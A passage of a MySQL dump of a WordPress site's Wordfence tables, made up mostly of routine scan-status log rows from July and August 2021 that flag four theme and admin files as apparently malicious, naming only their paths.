) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_wfreversecache`
--
LOCK TABLES `wp_wfreversecache` WRITE;
/*!40000 ALTER TABLE `wp_wfreversecache` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_wfreversecache` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_wfsnipcache`
--
DROP TABLE IF EXISTS `wp_wfsnipcache`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wfsnipcache` (
`id` int(10) unsigned NOT NULL AUTO_INCREMENT,
`IP` varchar(45) NOT NULL DEFAULT '',
`expiration` timestamp NOT NULL DEFAULT current_timestamp(),
`body` varchar(255) NOT NULL DEFAULT '',
`count` int(10) unsigned NOT NULL DEFAULT 0,
`type` int(10) unsigned NOT NULL DEFAULT 0,
PRIMARY KEY (`id`),
KEY `expiration` (`expiration`),
KEY `IP` (`IP`),
KEY `type` (`type`)
) ENGINE=InnoDB AUTO_INCREMENT=1367 DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_wfsnipcache`
--
LOCK TABLES `wp_wfsnipcache` WRITE;
/*!40000 ALTER TABLE `wp_wfsnipcache` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_wfsnipcache` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_wfstatus`
--
DROP TABLE IF EXISTS `wp_wfstatus`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wfstatus` (
`id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
`ctime` double(17,6) unsigned NOT NULL,
`level` tinyint(3) unsigned NOT NULL,
`type` char(5) NOT NULL,
`msg` varchar(1000) NOT NULL,
PRIMARY KEY (`id`),
KEY `k1` (`ctime`),
KEY `k2` (`type`)
) ENGINE=InnoDB AUTO_INCREMENT=3293 DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_wfstatus`
--
LOCK TABLES `wp_wfstatus` WRITE;
/*!40000 ALTER TABLE `wp_wfstatus` DISABLE KEYS */;
INSERT INTO `wp_wfstatus` VALUES (1882,1627384472.795961,1,'info','Quick Scan Complete. Scanned in less than 1 second.'),(1885,1627470830.766325,1,'info','Initiating quick scan'),(1890,1627470831.379524,1,'info','-------------------'),(1891,1627470831.427026,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 4 MB'),(1892,1627470831.451733,1,'info','Quick Scan Complete. Scanned in 1 second.'),(1895,1627557476.389032,1,'info','Initiating quick scan'),(1900,1627557476.704988,1,'info','-------------------'),(1901,1627557476.728691,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 20 MB'),(1902,1627557476.740314,1,'info','Quick Scan Complete. Scanned in less than 1 second.'),(1904,1627606928.961548,1,'info','Scheduled Wordfence scan starting at Friday 30th of July 2021 01:02:08 AM'),(1906,1627606929.354935,1,'info','Contacting Wordfence to initiate scan'),(1913,1627606936.525882,2,'info','Total disk space: 3.58 TB -- Free disk space: 3.31 TB'),(1914,1627606936.536153,2,'info','The disk has 3466136.47 MB available'),(1922,1627606936.705574,2,'info','Getting plugin list from WordPress'),(1923,1627606936.717106,2,'info','Found 6 plugins'),(1924,1627606936.719237,2,'info','Getting theme list from WordPress'),(1925,1627606936.745326,2,'info','Found 11 themes'),(1937,1627606938.752221,2,'info','500 files indexed'),(1938,1627606938.897089,2,'info','1000 files indexed'),(1939,1627606939.095767,2,'info','1500 files indexed'),(1940,1627606939.202086,2,'info','2000 files indexed'),(1941,1627606939.351023,2,'info','2500 files indexed'),(1942,1627606939.508660,2,'info','3000 files indexed'),(1943,1627606939.698769,2,'info','3500 files indexed'),(1944,1627606939.821893,2,'info','4000 files indexed'),(1945,1627606940.295675,2,'info','4475 files indexed'),(1946,1627606944.247963,2,'info','Analyzed 100 files containing 1.65 MB of data so far'),(1947,1627606948.921808,2,'info','Analyzed 200 files containing 3.22 MB of data so far'),(1948,1627606952.042157,2,'info','Analyzed 300 files containing 4.52 MB of data so far'),(1949,1627606955.712382,2,'info','Analyzed 400 files containing 7.21 MB of data so far'),(1950,1627606958.317965,2,'info','Analyzed 500 files containing 8.07 MB of data so far'),(1951,1627606961.741452,2,'info','Analyzed 600 files containing 8.93 MB of data so far'),(1952,1627606965.711663,2,'info','Analyzed 700 files containing 11.05 MB of data so far'),(1953,1627606968.857920,2,'info','Analyzed 800 files containing 12.36 MB of data so far'),(1954,1627606971.902256,2,'info','Analyzed 900 files containing 13.31 MB of data so far'),(1955,1627606975.215291,2,'info','Analyzed 1000 files containing 15.06 MB of data so far'),(1956,1627606978.723511,2,'info','Analyzed 1100 files containing 20.48 MB of data so far'),(1957,1627606982.265350,2,'info','Analyzed 1200 files containing 22.09 MB of data so far'),(1958,1627606986.297315,2,'info','Analyzed 1300 files containing 23.26 MB of data so far'),(1959,1627606989.038660,2,'info','Analyzed 1400 files containing 24 MB of data so far'),(1960,1627606992.969979,2,'info','Analyzed 1500 files containing 24.95 MB of data so far'),(1961,1627606996.379018,2,'info','Analyzed 1600 files containing 24.98 MB of data so far'),(1962,1627606998.777098,2,'info','Analyzed 1700 files containing 25.02 MB of data so far'),(1963,1627607002.967255,2,'info','Analyzed 1800 files containing 26.21 MB of data so far'),(1964,1627607005.053076,2,'info','Analyzed 1900 files containing 26.64 MB of data so far'),(1965,1627607008.893057,2,'info','Analyzed 2000 files containing 27.12 MB of data so far'),(1966,1627607012.131050,2,'info','Analyzed 2100 files containing 27.38 MB of data so far'),(1967,1627607015.093507,2,'info','Analyzed 2200 files containing 30.33 MB of data so far'),(1968,1627607018.850444,2,'info','Analyzed 2300 files containing 34.59 MB of data so far'),(1969,1627607022.450857,2,'info','Analyzed 2400 files containing 37.16 MB of data so far'),(1970,1627607025.876968,2,'info','Analyzed 2500 files containing 37.95 MB of data so far'),(1971,1627607028.253397,2,'info','Analyzed 2600 files containing 40.05 MB of data so far'),(1972,1627607032.835598,2,'info','Analyzed 2700 files containing 41.66 MB of data so far'),(1973,1627607035.947188,2,'info','Analyzed 2800 files containing 43.31 MB of data so far'),(1974,1627607039.166626,2,'info','Analyzed 2900 files containing 46.73 MB of data so far'),(1975,1627607041.285107,2,'info','Analyzed 3000 files containing 47.75 MB of data so far'),(1976,1627607045.053976,2,'info','Analyzed 3100 files containing 49 MB of data so far'),(1977,1627607047.748657,2,'info','Analyzed 3200 files containing 49.83 MB of data so far'),(1978,1627607050.635458,2,'info','Analyzed 3300 files containing 53.25 MB of data so far'),(1979,1627607053.223299,2,'info','Analyzed 3400 files containing 53.96 MB of data so far'),(1980,1627607054.718687,2,'info','Analyzed 3500 files containing 55.56 MB of data so far'),(1981,1627607058.532413,2,'info','Analyzed 3600 files containing 58.55 MB of data so far'),(1982,1627607061.606032,2,'info','Analyzed 3700 files containing 60.44 MB of data so far'),(1983,1627607063.883643,2,'info','Analyzed 3800 files containing 62.05 MB of data so far'),(1984,1627607068.002186,2,'info','Analyzed 3900 files containing 72.75 MB of data so far'),(1985,1627607071.728742,2,'info','Analyzed 4000 files containing 76.29 MB of data so far'),(1986,1627607074.650428,2,'info','Analyzed 4100 files containing 78.54 MB of data so far'),(1987,1627607077.826582,2,'info','Analyzed 4200 files containing 81.43 MB of data so far'),(1988,1627607081.061656,2,'info','Analyzed 4300 files containing 84.38 MB of data so far'),(1989,1627607084.038399,2,'info','Analyzed 4400 files containing 85.42 MB of data so far'),(1990,1627607086.653175,2,'info','Analyzed 4475 files containing 86.86 MB of data.'),(1998,1627607089.611084,2,'info','Starting scan of file contents'),(1999,1627607090.646213,2,'info','Scanned contents of 69 additional files at 67.12 per second'),(2000,1627607091.650475,2,'info','Scanned contents of 99 additional files at 48.71 per second'),(2001,1627607092.742294,2,'info','Scanned contents of 162 additional files at 51.85 per second'),(2002,1627607093.202126,2,'info','Scanned contents of 192 additional files at 53.57 per second'),(2003,1627607093.204331,2,'info','Asking Wordfence to check URLs against malware list.'),(2004,1627607093.206770,2,'info','Checking 229 host keys against Wordfence scanning servers.'),(2005,1627607093.838863,2,'info','Done host key check.'),(2006,1627607095.352427,2,'info','Done file contents scan'),(2007,1627607095.363572,2,'info','Adding issue: File appears to be malicious or unsafe: wp-content/themes/doctors/core/contents/part_footer/part_footer/index.php'),(2008,1627607095.384856,2,'info','Adding issue: File appears to be malicious or unsafe: wp-content/themes/doctors/core/contents/loop_attachment/loop_attachment/index.php'),(2009,1627607095.406259,2,'info','Adding issue: File appears to be malicious or unsafe: wp-content/themes/doctors/core/contents/loop_author/loop_author/index.php'),(2010,1627607095.437535,2,'info','Adding issue: File appears to be malicious or unsafe: wp-admin/js/index.php'),(2016,1627607095.741389,2,'info','Examining URLs found in posts we scanned for dangerous websites'),(2017,1627607095.743915,2,'info','Checking 181 host keys against Wordfence scanning servers.'),(2018,1627607096.333974,2,'info','Done host key check.'),(2019,1627607096.338353,2,'info','Done examining URLs'),(2024,1627607096.886944,2,'info','Starting password strength check on 1 user.'),(2031,1627607100.713910,2,'info','Examining URLs found in the options we scanned for dangerous websites'),(2032,1627607100.720522,2,'info','Done examining URLs'),(2034,1627607100.923134,1,'info','-------------------'),(2035,1627607100.929080,2,'info','Wordfence used 15.01 MB of memory for scan. Server peak memory usage was: 35.01 MB'),(2036,1627607100.937766,1,'info','Scan Complete. Scanned 4475 files, 7 plugins, 11 themes, 26 posts, 0 comments and 317 URLs in 2 minutes 50 seconds.'),(2039,1627643699.496480,1,'info','Initiating quick scan'),(2044,1627643700.812568,1,'info','-------------------'),(2045,1627643700.833195,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 20 MB'),(2046,1627643700.835485,1,'info','Quick Scan Complete. Scanned in 1 second.'),(2049,1627730009.186611,1,'info','Initiating quick scan'),(2054,1627730009.540796,1,'info','-------------------'),(2055,1627730009.562544,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 12 MB'),(2056,1627730009.573243,1,'info','Quick Scan Complete. Scanned in less than 1 second.'),(2059,1627816508.265723,1,'info','Initiating quick scan'),(2064,1627816508.608050,1,'info','-------------------'),(2065,1627816508.633494,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 20 MB'),(2066,1627816508.647503,1,'info','Quick Scan Complete. Scanned in less than 1 second.'),(2068,1627866038.649855,1,'info','Scheduled Wordfence scan starting at Monday 2nd of August 2021 01:00:38 AM'),(2070,1627866039.846424,1,'info','Contacting Wordfence to initiate scan'),(2077,1627866048.946848,2,'info','Total disk space: 3.58 TB -- Free disk space: 3.3 TB'),(2078,1627866049.021946,2,'info','The disk has 3465537.79 MB available'),(2086,1627866050.924279,2,'info','Getting plugin list from WordPress'),(2087,1627866050.993335,2,'info','Found 6 plugins'),(2088,1627866051.048989,2,'info','Getting theme list from WordPress'),(2089,1627866051.234717,2,'info','Found 11 themes'),(2101,1627866056.302805,2,'info','500 files indexed'),(2102,1627866056.657563,2,'info','1000 files indexed'),(2103,1627866057.068263,2,'info','1500 files indexed'),(2104,1627866057.165952,2,'info','1501 files indexed'),(2105,1627866060.283280,2,'info','2001 files indexed'),(2106,1627866060.622992,2,'info','2501 files indexed'),(2107,1627866060.877909,2,'info','3001 files indexed'),(2108,1627866061.403090,2,'info','3501 files indexed'),(2109,1627866061.596824,2,'info','4001 files indexed'),(2110,1627866061.839094,2,'info','4475 files indexed'),(2111,1627866079.999454,2,'info','Analyzed 100 files containing 1.65 MB of data so far'),(2112,1627866097.867159,2,'info','Analyzed 200 files containing 3.22 MB of data so far'),(2113,1627866115.891047,2,'info','Analyzed 300 files containing 4.52 MB of data so far'),(2114,1627866133.218438,2,'info','Analyzed 400 files containing 7.21 MB of data so far'),(2115,1627866152.944488,2,'info','Analyzed 500 files containing 8.07 MB of data so far'),(2116,1627866169.327864,2,'info','Analyzed 600 files containing 8.93 MB of data so far'),(2117,1627866188.823049,2,'info','Analyzed 700 files containing 11.05 MB of data so far'),(2118,1627866208.052113,2,'info','Analyzed 800 files containing 12.36 MB of data so far'),(2119,1627866224.652232,2,'info','Analyzed 900 files containing 13.31 MB of data so far'),(2120,1627866244.048169,2,'info','Analyzed 1000 files containing 15.06 MB of data so far'),(2121,1627866260.670940,2,'info','Analyzed 1100 files containing 20.48 MB of data so far'),(2122,1627866273.705549,2,'info','Analyzed 1200 files containing 22.09 MB of data so far'),(2123,1627866291.831303,2,'info','Analyzed 1300 files containing 23.26 MB of data so far'),(2124,1627866305.838385,2,'info','Analyzed 1400 files containing 24 MB of data so far'),(2125,1627866321.995713,2,'info','Analyzed 1500 files containing 24.95 MB of data so far'),(2126,1627866342.425637,2,'info','Analyzed 1600 files containing 24.98 MB of data so far'),(2127,1627866358.432011,2,'info','Analyzed 1700 files containing 25.02 MB of data so far'),(2128,1627866376.091594,2,'info','Analyzed 1800 files containing 26.21 MB of data so far'),(2129,1627866388.858518,2,'info','Analyzed 1900 files containing 26.64 MB of data so far'),(2130,1627866408.565753,2,'info','Analyzed 2000 files containing 27.12 MB of data so far'),(2131,1627866421.781026,2,'info','Analyzed 2100 files containing 27.38 MB of data so far'),(2132,1627866438.988778,2,'info','Analyzed 2200 files containing 30.33 MB of data so far'),(2133,1627866462.996082,2,'info','Analyzed 2300 files containing 34.59 MB of data so far'),(2134,1627866486.409822,2,'info','Analyzed 2400 files containing 37.16 MB of data so far'),(2135,1627866512.314507,2,'info','Analyzed 2500 files containing 37.95 MB of data so far'),(2136,1627866526.452813,2,'info','Analyzed 2600 files containing 40.05 MB of data so far'),(2137,1627866543.906949,2,'info','Analyzed 2700 files containing 41.66 MB of data so far'),(2138,1627866557.193783,2,'info','Analyzed 2800 files containing 43.31 MB of data so far'),(2139,1627866576.799505,2,'info','Analyzed 2900 files containing 46.73 MB of data so far'),(2140,1627866595.876759,2,'info','Analyzed 3000 files containing 47.75 MB of data so far'),(2141,1627866616.536390,2,'info','Analyzed 3100 files containing 49 MB of data so far'),(2142,1627866644.187130,2,'info','Analyzed 3200 files containing 49.83 MB of data so far'),(2143,1627866663.259585,2,'info','Analyzed 3300 files containing 53.25 MB of data so far'),(2144,1627866682.266117,2,'info','Analyzed 3400 files containing 53.96 MB of data so far'),(2145,1627866701.273508,2,'info','Analyzed 3500 files containing 55.56 MB of data so far'),(2146,1627866715.272773,2,'info','Analyzed 3600 files containing 58.55 MB of data so far'),(2147,1627866732.499419,2,'info','Analyzed 3700 files containing 60.44 MB of data so far'),(2148,1627866751.721942,2,'info','Analyzed 3800 files containing 62.05 MB of data so far'),(2149,1627866771.486627,2,'info','Analyzed 3900 files containing 72.75 MB of data so far'),(2150,1627866792.450305,2,'info','Analyzed 4000 files containing 76.29 MB of data so far'),(2151,1627866821.605227,2,'info','Analyzed 4100 files containing 78.54 MB of data so far'),(2152,1627866848.497352,2,'info','Analyzed 4200 files containing 81.43 MB of data so far'),(2153,1627866865.827896,2,'info','Analyzed 4300 files containing 84.38 MB of data so far'),(2154,1627866884.281649,2,'info','Analyzed 4400 files containing 85.42 MB of data so far'),(2155,1627866898.206609,2,'info','Analyzed 4475 files containing 86.86 MB of data.'),(2163,1627866901.429911,2,'info','Starting scan of file contents'),(2164,1627866902.474258,2,'info','Scanned contents of 8 additional files at 7.96 per second'),(2165,1627866903.518759,2,'info','Scanned contents of 18 additional files at 8.78 per second'),(2166,1627866904.564496,2,'info','Scanned contents of 28 additional files at 9.04 per second'),(2167,1627866905.598821,2,'info','Scanned contents of 39 additional files at 9.44 per second'),(2168,1627866906.651190,2,'info','Scanned contents of 50 additional files at 9.65 per second'),(2169,1627866907.710009,2,'info','Scanned contents of 59 additional files at 9.45 per second'),(2170,1627866908.899887,2,'info','Scanned contents of 63 additional files at 8.48 per second'),(2171,1627866910.069011,2,'info','Scanned contents of 69 additional files at 8.02 per second'),(2172,1627866911.213768,2,'info','Scanned contents of 77 additional files at 7.90 per second'),(2173,1627866912.298383,2,'info','Scanned contents of 84 additional files at 7.76 per second'),(2174,1627866913.303804,2,'info','Scanned contents of 92 additional files at 7.77 per second'),(2175,1627866914.450233,2,'info','Scanned contents of 100 additional files at 7.70 per second'),(2176,1627866915.484711,2,'info','Scanned contents of 108 additional files at 7.71 per second'),(2177,1627866916.509100,2,'info','Scanned contents of 116 additional files at 7.71 per second'),(2178,1627866917.571169,2,'info','Scanned contents of 124 additional files at 7.70 per second'),(2179,1627866919.271419,2,'info','Scanned contents of 130 additional files at 7.30 per second'),(2180,1627866920.411701,2,'info','Scanned contents of 132 additional files at 6.97 per second'),(2181,1627866921.564825,2,'info','Scanned contents of 135 additional files at 6.72 per second'),(2182,1627866922.582208,2,'info','Scanned contents of 144 additional files at 6.82 per second'),(2183,1627866923.633396,2,'info','Scanned contents of 151 additional files at 6.81 per second'),(2184,1627866927.438323,2,'info','Scanned contents of 153 additional files at 5.89 per second'),(2185,1627866928.687732,2,'info','Scanned contents of 160 additional files at 5.88 per second'),(2186,1627866929.752561,2,'info','Scanned contents of 167 additional files at 5.90 per second'),(2187,1627866930.835603,2,'info','Scanned contents of 176 additional files at 5.99 per second'),(2188,1627866931.853463,2,'info','Scanned contents of 184 additional files at 6.06 per second'),(2189,1627866932.680415,2,'info','Scanned contents of 192 additional files at 6.15 per second'),(2190,1627866932.732379,2,'info','Asking Wordfence to check URLs against malware list.'),(2191,1627866932.767040,2,'info','Checking 229 host keys against Wordfence scanning servers.'),(2192,1627866933.414738,2,'info','Done host key check.'),(2193,1627866935.244818,2,'info','Done file contents scan'),(2194,1627866935.821471,2,'info','Adding issue: File appears to be malicious or unsafe: wp-content/themes/doctors/core/contents/part_footer/part_footer/index.php'),(2195,1627866935.920892,2,'info','Adding issue: File appears to be malicious or unsafe: wp-content/themes/doctors/core/contents/loop_attachment/loop_attachment/index.php'),(2196,1627866935.954761,2,'info','Adding issue: File appears to be malicious or unsafe: wp-content/themes/doctors/core/contents/loop_author/loop_author/index.php'),(2197,1627866936.108052,2,'info','Adding issue: File appears to be malicious or unsafe: wp-admin/js/index.php'),(2203,1627866937.928885,2,'info','Examining URLs found in posts we scanned for dangerous websites'),(2204,1627866938.050270,2,'info','Checking 181 host keys against Wordfence scanning servers.'),(2205,1627866939.947771,2,'info','Done host key check.'),(2206,1627866939.989561,2,'info','Done examining URLs'),(2211,1627866942.301315,2,'info','Starting password strength check on 1 user.'),(2218,1627866949.508135,2,'info','Examining URLs found in the options we scanned for dangerous websites'),(2219,1627866949.549628,2,'info','Done examining URLs'),(2221,1627866950.156875,1,'info','-------------------'),(2222,1627866950.187342,2,'info','Wordfence used 23.05 MB of memory for scan. Server peak memory usage was: 35.05 MB'),(2223,1627866950.235515,1,'info','Scan Complete. Scanned 4475 files, 7 plugins, 11 themes, 26 posts, 0 comments and 317 URLs in 15 minutes 9 seconds.'),(2226,1627902934.521230,1,'info','Initiating quick scan'),(2231,1627902942.758441,1,'info','-------------------'),(2232,1627902942.988952,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 20 MB'),(2233,1627902943.011105,1,'info','Quick Scan Complete. Scanned in 9 seconds.'),(2236,1627989228.681902,1,'info','Initiating quick scan'),(2241,1627989230.356690,1,'info','-------------------'),(2242,1627989230.482636,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 20 MB'),(2243,1627989230.557582,1,'info','Quick Scan Complete. Scanned in 2 seconds.'),(2246,1628075773.243314,1,'info','Initiating quick scan'),(2251,1628075773.605274,1,'info','-------------------'),(2252,1628075773.609368,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 20 MB'),(2253,1628075773.618271,1,'info','Quick Scan Complete. Scanned in less than 1 second.'),(2255,1628125205.871726,1,'info','Scheduled Wordfence scan starting at Thursday 5th of August 2021 01:00:05 AM'),(2257,1628125207.166077,1,'info','Contacting Wordfence to initiate scan'),(2264,1628125217.618930,2,'info','Total disk space: 3.58 TB -- Free disk space: 3.3 TB'),(2265,1628125217.621377,2,'info','The disk has 3465002.79 MB available'),(2273,1628125217.741159,2,'info','Getting plugin list from WordPress'),(2274,1628125217.749979,2,'info','Found 6 plugins'),(2275,1628125217.752561,2,'info','Getting theme list from WordPress'),(2276,1628125217.794874,2,'info','Found 11 themes'),(2288,1628125219.961822,2,'info','500 files indexed'),(2289,1628125220.259528,2,'info','1000 files indexed'),(2290,1628125220.399706,2,'info','1500 files indexed'),(2291,1628125220.596660,2,'info','2000 files indexed'),(2292,1628125220.780756,2,'info','2500 files indexed'),(2293,1628125220.962996,2,'info','3000 files indexed'),(2294,1628125221.121364,2,'info','3500 files indexed'),(2295,1628125221.221267,2,'info','4000 files indexed'),(2296,1628125221.304850,2,'info','4475 files indexed'),(2298,1628248451.255046,1,'info','Initiating quick scan'),(2303,1628248451.499167,1,'info','-------------------'),(2304,1628248451.505106,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 20 MB'),(2305,1628248451.507229,1,'info','Quick Scan Complete. Scanned in less than 1 second.'),(2308,1628334879.839781,1,'info','Initiating quick scan'),(2313,1628334880.285843,1,'info','-------------------'),(2314,1628334880.314593,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 20 MB'),(2315,1628334880.325783,1,'info','Quick Scan Complete. Scanned in 1 second.'),(2317,1628384532.153699,1,'info','Scheduled Wordfence scan starting at Sunday 8th of August 2021 01:02:12 AM'),(2319,1628384532.641808,1,'info','Contacting Wordfence to initiate scan'),(2326,1628384540.084058,2,'info','Total disk space: 3.58 TB -- Free disk space: 3.3 TB'),(2327,1628384540.085925,2,'info','The disk has 3465469.48 MB available'),(2335,1628384540.193712,2,'info','Getting plugin list from WordPress'),(2336,1628384540.208464,2,'info','Found 6 plugins'),(2337,1628384540.210500,2,'info','Getting theme list from WordPress'),(2338,1628384540.230614,2,'info','Found 11 themes'),(2350,1628384543.180020,2,'info','500 files indexed'),(2351,1628384543.479247,2,'info','1000 files indexed'),(2352,1628384543.675030,2,'info','1500 files indexed'),(2353,1628384543.991447,2,'info','2000 files indexed'),(2354,1628384544.174499,2,'info','2500 files indexed'),(2355,1628384544.349389,2,'info','3000 files indexed'),(2356,1628384544.431057,2,'info','3500 files indexed'),(2357,1628384544.467071,2,'info','4000 files indexed'),(2358,1628384544.556406,2,'info','4475 files indexed'),(2359,1628384548.573322,2,'info','Analyzed 100 files containing 1.65 MB of data so far'),(2360,1628384553.237636,2,'info','Analyzed 200 files containing 3.22 MB of data so far'),(2361,1628384558.069990,2,'info','Analyzed 300 files containing 4.52 MB of data so far'),(2362,1628384561.494714,2,'info','Analyzed 400 files containing 7.21 MB of data so far'),(2363,1628384566.310987,2,'info','Analyzed 500 files containing 8.07 MB of data so far'),(2364,1628384569.797528,2,'info','Analyzed 600 files containing 8.93 MB of data so far'),(2365,1628384573.992646,2,'info','Analyzed 700 files containing 11.05 MB of data so far'),(2366,1628384577.068126,2,'info','Analyzed 800 files containing 12.36 MB of data so far'),(2367,1628384581.945735,2,'info','Analyzed 900 files containing 13.31 MB of data so far'),(2368,1628384585.789349,2,'info','Analyzed 1000 files containing 15.06 MB of data so far'),(2369,1628384589.158111,2,'info','Analyzed 1100 files containing 20.48 MB of data so far'),(2370,1628384591.543621,2,'info','Analyzed 1200 files containing 22.09 MB of data so far'),(2371,1628384594.145632,2,'info','Analyzed 1300 files containing 23.26 MB of data so far'),(2372,1628384596.396538,2,'info','Analyzed 1400 files containing 24 MB of data so far'),(2373,1628384599.420512,2,'info','Analyzed 1500 files containing 24.95 MB of data so far'),(2374,1628384602.611566,2,'info','Analyzed 1600 files containing 24.98 MB of data so far'),(2375,1628384607.768231,2,'info','Analyzed 1700 files containing 25.02 MB of data so far'),(2376,1628384611.242486,2,'info','Analyzed 1800 files containing 26.21 MB of data so far'),(2377,1628384614.751121,2,'info','Analyzed 1900 files containing 26.64 MB of data so far'),(2378,1628384618.158040,2,'info','Analyzed 2000 files containing 27.12 MB of data so far'),(2379,1628384621.619492,2,'info','Analyzed 2100 files containing 27.38 MB of data so far'),(2380,1628384624.556693,2,'info','Analyzed 2200 files containing 30.33 MB of data so far'),(2381,1628384627.842123,2,'info','Analyzed 2300 files containing 34.59 MB of data so far'),(2382,1628384631.606710,2,'info','Analyzed 2400 files containing 37.16 MB of data so far'),(2383,1628384634.516669,2,'info','Analyzed 2500 files containing 37.95 MB of data so far'),(2384,1628384638.190595,2,'info','Analyzed 2600 files containing 40.05 MB of data so far'),(2385,1628384642.005713,2,'info','Analyzed 2700 files containing 41.66 MB of data so far'),(2386,1628384645.809719,2,'info','Analyzed 2800 files containing 43.31 MB of data so far'),(2387,1628384649.824452,2,'info','Analyzed 2900 files containing 46.73 MB of data so far'),(2388,1628384652.555720,2,'info','Analyzed 3000 files containing 47.75 MB of data so far'),(2389,1628384655.989892,2,'info','Analyzed 3100 files containing 49 MB of data so far'),(2390,1628384659.229457,2,'info','Analyzed 3200 files containing 49.83 MB of data so far'),(2391,1628384664.489786,2,'info','Analyzed 3300 files containing 53.26 MB of data so far'),(2392,1628384667.385225,2,'info','Analyzed 3400 files containing 53.96 MB of data so far'),(2393,1628384669.554889,2,'info','Analyzed 3500 files containing 55.57 MB of data so far'),(2394,1628384672.465982,2,'info','Analyzed 3600 files containing 58.55 MB of data so far'),(2395,1628384676.378730,2,'info','Analyzed 3700 files containing 60.44 MB of data so far'),(2396,1628384680.079598,2,'info','Analyzed 3800 files containing 62.06 MB of data so far'),(2397,1628384683.830139,2,'info','Analyzed 3900 files containing 72.76 MB of data so far'),(2398,1628384687.154152,2,'info','Analyzed 4000 files containing 76.3 MB of data so far'),(2399,1628384690.108726,2,'info','Analyzed 4100 files containing 78.54 MB of data so far'),(2400,1628384693.282305,2,'info','Analyzed 4200 files containing 81.43 MB of data so far'),(2401,1628384696.763403,2,'info','Analyzed 4300 files containing 84.39 MB of data so far'),(2402,1628384699.683527,2,'info','Analyzed 4400 files containing 85.43 MB of data so far'),(2403,1628384701.858106,2,'info','Analyzed 4475 files containing 86.86 MB of data.'),(2411,1628384703.900617,2,'info','Starting scan of file contents'),(2412,1628384704.954246,2,'info','Scanned contents of 47 additional files at 45.16 per second'),(2413,1628384705.997811,2,'info','Scanned contents of 79 additional files at 37.90 per second'),(2414,1628384707.080490,2,'info','Scanned contents of 121 additional files at 38.21 per second'),(2415,1628384708.146162,2,'info','Scanned contents of 150 additional files at 35.44 per second'),(2416,1628384709.066299,2,'info','Scanned contents of 192 additional files at 37.26 per second'),(2417,1628384709.068366,2,'info','Asking Wordfence to check URLs against malware list.'),(2418,1628384709.070603,2,'info','Checking 229 host keys against Wordfence scanning servers.'),(2419,1628384709.683621,2,'info','Done host key check.'),(2420,1628384710.915847,2,'info','Done file contents scan'),(2421,1628384710.918315,2,'info','Adding issue: File appears to be malicious or unsafe: wp-content/themes/doctors/core/contents/part_footer/part_footer/index.php'),(2422,1628384710.922763,2,'info','Adding issue: File appears to be malicious or unsafe: wp-content/themes/doctors/core/contents/loop_attachment/loop_attachment/index.php'),(2423,1628384710.926885,2,'info','Adding issue: File appears to be malicious or unsafe: wp-content/themes/doctors/core/contents/loop_author/loop_author/index.php'),(2424,1628384710.931147,2,'info','Adding issue: File appears to be malicious or unsafe: wp-admin/js/index.php'),(2430,1628384711.088720,2,'info','Examining URLs found in posts we scanned for dangerous websites'),(2431,1628384711.090947,2,'info','Checking 181 host keys against Wordfence scanning servers.'),(2432,1628384711.709568,2,'info','Done host key check.'),(2433,1628384711.720701,2,'info','Done examining URLs'),(2438,1628384712.113522,2,'info','Starting password strength check on 1 user.'),(2445,1628384715.797297,2,'info','Examining URLs found in the options we scanned for dangerous websites'),(2446,1628384715.800552,2,'info','Done examining URLs'),(2448,1628384715.885560,1,'info','-------------------'),(2449,1628384715.888581,2,'info','Wordfence used 15.06 MB of memory for scan. Server peak memory usage was: 35.06 MB'),(2450,1628384715.890875,1,'info','Scan Complete. Scanned 4475 files, 7 plugins, 11 themes, 26 posts, 0 comments and 317 URLs in 3 minutes 2 seconds.'),(2453,1628421237.098351,1,'info','Initiating quick scan'),(2458,1628421237.577696,1,'info','-------------------'),(2459,1628421237.599055,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 20 MB'),(2460,1628421237.609683,1,'info','Quick Scan Complete. Scanned in less than 1 second.'),(2463,1628507643.014193,1,'info','Initiating quick scan'),(2468,1628507643.367563,1,'info','-------------------'),(2469,1628507643.389873,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 20 MB'),(2470,1628507643.406970,1,'info','Quick Scan Complete. Scanned in less than 1 second.'),(2473,1628593997.785062,1,'info','Initiating quick scan'),(2478,1628593998.159932,1,'info','-------------------'),(2479,1628593998.187851,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 18 MB'),(2480,1628593998.198599,1,'info','Quick Scan Complete. Scanned in 1 second.'),(2482,1628643604.523340,1,'info','Scheduled Wordfence scan starting at Wednesday 11th of August 2021 01:00:04 AM'),(2484,1628643616.964576,1,'info','Contacting Wordfence to initiate scan'),(2491,1628643626.940160,2,'info','Total disk space: 3.58 TB -- Free disk space: 3.3 TB'),(2492,1628643626.961723,2,'info','The disk has 3464995.04 MB available'),(2500,1628643630.137352,2,'info','Getting plugin list from WordPress'),(2501,1628643630.244997,2,'info','Found 6 plugins'),(2502,1628643630.324577,2,'info','Getting theme list from WordPress'),(2503,1628643630.911437,2,'info','Found 11 themes'),(2515,1628643638.592712,2,'info','500 files indexed'),(2516,1628643638.790273,2,'info','1000 files 